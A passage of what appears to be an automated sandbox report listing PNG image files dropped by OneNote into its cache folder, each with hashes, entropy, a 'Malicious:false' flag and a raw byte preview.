                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
